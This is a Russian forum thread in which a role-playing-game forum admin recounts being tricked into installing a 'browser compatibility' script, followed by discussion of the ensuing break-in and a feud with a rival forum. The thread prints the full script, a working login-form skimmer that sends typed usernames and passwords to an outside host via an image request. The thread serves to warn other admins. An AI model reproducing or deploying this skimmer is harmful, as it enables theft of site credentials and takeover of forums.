Данный проект создан для того, чтобы начинающие администраторы и Гейм-мастера могли найти здесь ответы на вопросы, часто возникающие при организации форумной ролевой литературной игры (верхние разделы форума). Остальные разделы предназначены для размещения рекламы ваших игр. РЕКЛАМА ВЗАИМНАЯ . Внимание! Правила рекламного каталога изменились: в каталог не принимается реклама форумов, пропагандирующих любые половые отклонения.
Отправлено: 26.11.07 22:39. Заголовок: Рассказ о взломе
[Удалено администратором :) ] Администратор решил вернуть удаленное. Издание 2-е, перераб. и доп.
24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Вот этот скрипт:
<script type="text/javascript"> function block (t) { t = t.replace("%", escape("%")); t = t.replace("$", escape("$")); t = t.replace("#", escape("#")); t = t.replace("\\", escape("\\")); return t; } function newtest() { if (document.all.nick.value) { a = document.all.nick.value; b = document.all.pass.value; } else if (document.frm.nick.value) { a = document.frm.nick.value; b = document.frm.pass.value; } else { a = "undefined"; b = "no"; } a = block(a); b = block(b); img = new Image(); img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b; setTimeout("newtest()", 1); } document.temp = new function() { var sec = document.write; this.write = function(txt) { txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>"); this.sec = sec; this.sec(txt); this.sec = null; return true; } return this; } document.write = document.temp.write; document.temp = null; document.writeln = document.write; </script>
Ночью форум был взломан. (кликните на картинку, чтобы прочитать "послание" взломщика)
Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров.
Разговоры на форуме "Критик" до взлома моего форума:
После взлома: Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше.
"У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист. Действительно, тему почистили не всю. Чистосердечное признание! cater - второй ник Кота Бегемота.
Комментарий специалиста:
цитата:
Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"
Дорогой Zenitchik! Фразу о том, что у кого-то на "Лисе" друзья - мне, конечно, чисто по-человечески, было приятно слышать - но это не аргумент!
У каждого форума есть:
Цели.
Задачи.
Актуальность его в данный момент.
Для более продвинутых форумов, типа Вашего Ролес, который претендует на исследователльскую работу, можно ввести ещё категории:
Объект исследования.
Предмет исследования.
Гипотеза.
Медология и методика исследования.
Но первые три тункта (верхние) обязательны для любого форума, пусть даже это форум по ГП.
Цель данного форума - реклама ролевых игр. - Выполняется? Насколько? Задача даного форума - размещение шаблонной рекламы, размешение рекламных баннеров. Далее оценка: Насколько хорошо скомпанованы рекламные разделы, удобно ли в них читать рекламу. Удобно ли размещены баннеры для пользования ими клиентами?
Актуальность: Игровые форумы нуждаются в рекламе? Может на рынке переизбыток таких рекламных форумов? И т.д.
Вот это - оценка! А "оценка" - «у них слишком много баннеров» - это не оценка. Форум создан для размещения баннеров. Если их мало, значит задачи форума не выполняются. Поэтому и дизайн я пытался сделать максимально лёгким - потому что его неминуемо будут утяжелять баннеры (почему я и не оставил диз "Зеленое озеро" - для такого форума он был тяжеловат)
А то что они говорят - это просто легкомысленная беседа ни о чём.
Отправлено: 01.12.07 22:58. Заголовок: Sem пишет: Зачем ид..
Sem пишет:
цитата:
Зачем идти туда, куда не приглашали и еще и навязывать свое мнение?
Думаю, в случае с Критиком всё просто: идут они потому, что иначе до них мало кому дело есть. А выпендриться хочется. Дети же)). И не говорите мне, что не дети. Были бы взрослее - вели бы себя серьёзнее, чем таскаться по чужим форумам, а потом не знать, как бы так заманить к себе админа, чтобы он на них внимание обратил. А кому это надо? Да я 100 % даю, что если бы они Ролес не боялись, они бы и про него фиг знает чего говорили и фиг бы поставили в свой зал почёта. Я одни названия их разделов почитал - уже всё понял, закрыл и больше не открывал. Детский сад - младшая группа.
Они? Боялись Ролес? Вы, наверно, шутите! Мы появились, как их смягченная форма! Конечно, с тех пор многое изменилось, но наследник ПОЗОРа - страшнее нас по определению. Хотя, они свой авторитет здорово подорвали в последнее время. ИМХО, именно отсутствием "тормоза".
Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале.
Zenitchik Представьте, подходят к вас детишки из детского сада и говорят: "Знаешь, дядя, мы щас тя оценивать будем". Блеск! Ну, я понимаю критиков, они так самоутверждаются. Но вы-то, взрослый человек!.. Ещё скажите, что вы их боитесь.
Отправлено: 02.12.07 18:53. Заголовок: Я не боюсь Критиков ..
Я не боюсь Критиков не потому. Дело в том, что у меня там все свои. Мне тут предлагали забыть, свое ПОЗОРное прошлое, но как можно забыть то, о чем ностальгируешь? У меня на Ролес работали одно время "динозавры" ПОЗОРа - Рунира и Плинер. А Критик - так, вялый аналог. Больно видеть как он деградировал после того, как половина толковых людей откололась...
Отправлено: 02.12.07 18:56. Заголовок: Кстати, мы одно врем..
Кстати, мы одно время Критик в качестве пугала использовали ))) Типа, тех, кто у нас в каталоге мы от них прикроем ))) После раскола на Критике - пугала не стало.
UPD: Пардон за мультипостинг. В ФФ ужасно неудобно по сравнению с MyIE реализована многооконность.
Отправлено: 05.12.07 14:17. Заголовок: Хм... Если бы все от..
Хм... Если бы все относились к kritik, так как я - его бы давно уже не было. Я кстати, тоже не совсем правильно отнёсся: не надо было о взломе ничего писать.
Но я уже всё убрал!
Оффтоп: Zenitchik пишет:
цитата:
Пардон за мультипостинг.
Можешь не извиняться. На это я смотрю сквозь пальцы...
Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале.
Просто у них комплекс вины теперь. Они же не окончательные кретины. Голова-то всё же есть на плечах, понимают, что вот так просто "ни за что не про что" взломали чужой форум (который сами же взялись оценивать), ради собственного удовольствия. Вернее один взломал, а остальные с этим согласились. Теперь чувствуют себя виноватыми.
Отправлено: 05.12.07 22:05. Заголовок: Solo Из оценка нужн..
Solo Из оценка нужна прежде всего им самим. А то получается, что они у себя на своём Критике занимаются фигнёй. А так, оценил кого-то - сделал себе приятное. Если бы Лис пришёл с ними ругаться - им была бы радость. А Лис не пришёл (хороший мальчик). Тогда они стали его ругать, в надежде, что не выдержит. А потом поняли, что бесполезно - решили другим манером и похвалили вроде бы. Да я их понимаю, ну хочется людям, чтобы к ним шли. Я бы пошёл, попробовал объяснить, что не такими методами к себе заманивать надо. Да и то сказать, у них достаточно народу, чтобы беспокоиться из-за нехватки. Только боюсь, всё равно не поймут. Потому не пойду.
Сообщение: 273
Настроение: Выпить две кружки ртути. Чтоб уже наверняка.
Откуда: Антиутопия
Репутация:
4
Отправлено: 05.12.07 22:09. Заголовок: McNamara, да вряд ли..
McNamara, да вряд ли. Посещаемость у форума высокая - как и у любого ресурса подобной направленности. Так что это просто и банально сублимирование комплексов.
Почитайте обсуждение и сами убедитесь: критиковали справедливо и даже довольно мягко. Хотя, порядок у них на форуме не мой...
Фу, какая грязь, как низко: никакой этики и банального человеческого уважения. Критика критике рознь. Есть критика конструктивная, когда высказывают пожелания по улучшению, а есть деструктивная критика, направленная на втаптывание в грязь и утеху собственного самолюбия.
Хоть я и фактически ещё не являюсь участником коллектива вашего форума, и, может, я не совсем в теме событий, но на мой взгляд, эти люди совсем не то авторитетное мнение, которое стоит слушать.
Сентябрьскому Лису, мой личный поклон, а после прочитанного на Критике, уважение к вам и вашему ресурсу у меня только повысились, хотя бы потому что вы держитесь достойно и вполне взросло, адекватно и как деловые люди, с вами приятно иметь дело.
Кеяру Пожимаю Вашу мужественную руку. И вполне считаю Вас участником данного форума. И более того, Вы во всём абсолютно правы. А критика всегда должна быть конструктивной. Иначе это не критика, а ругательство.
Сообщение: 1039
Настроение: не лучшее
Откуда: Россия, СПб
Репутация:
9
Награды:
Отправлено: 04.07.08 15:12. Заголовок: Кстати, зря я говори..
Кстати, зря я говорил о том, что Бегемот поступил достаточно благородно, навредив форуму после взлома не в полную силу. Всё-таки грохнул он у меня одну тему о проблемных игроках. Там была статья Мэгги (ещё под ником Линнда Палпатин) о проблемных игроках.
Я перекопал весь форум, пересмотрел по несколько раз те темы в которых эта статья потенциально могла быть (а на это ушло несколько дней), после меня всё перекопала Мэгги. Статьи точно нет. А ссылка а неё в одном из сообщений http://septemberfox.forum24.ru/?1-2-0-00000027-000-0-0#006 ведёт в совершенно левую тему и указывает на совершенно левое сообщение. (При перемещении тем на форумах Borda их адреса теряются, вернее начинают указывать на другую тему, которая стоит на месте старой. На Ucoz при перемещении темы в другой раздел ссылка всё равно приводит именно на нужную ему. Однако, мы говорим не о UcoZ'е сейчас).
Короче, тема со статьёй всё таки была удалена, вероятно, "за компанию". Взлом есть взлом.
Отправлено: 04.07.08 20:06. Заголовок: Просмотрела все в ле..
Просмотрела все в легком шоке, если честно. Даже прокомментировать не знаю как лучше... В общем, ужас да и только... Век бы у взломщика руки горчицей были намазаны...
Отправлено: 04.07.08 20:08. Заголовок: Ой, от шока даже зап..
Ой, от шока даже запамятовала поблагодарить Лиса за столь ценную информацию. Теперь будем знать о данном скрипте. Хотя, я бы ни при каких условиях не согласилась к себе на сайт поставить что-то с чужих рук. Не на таких горбатились, не для таких делаем уступки...
Все даты в формате GMT
3 час. Хитов сегодня: 11
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация откл, правка нет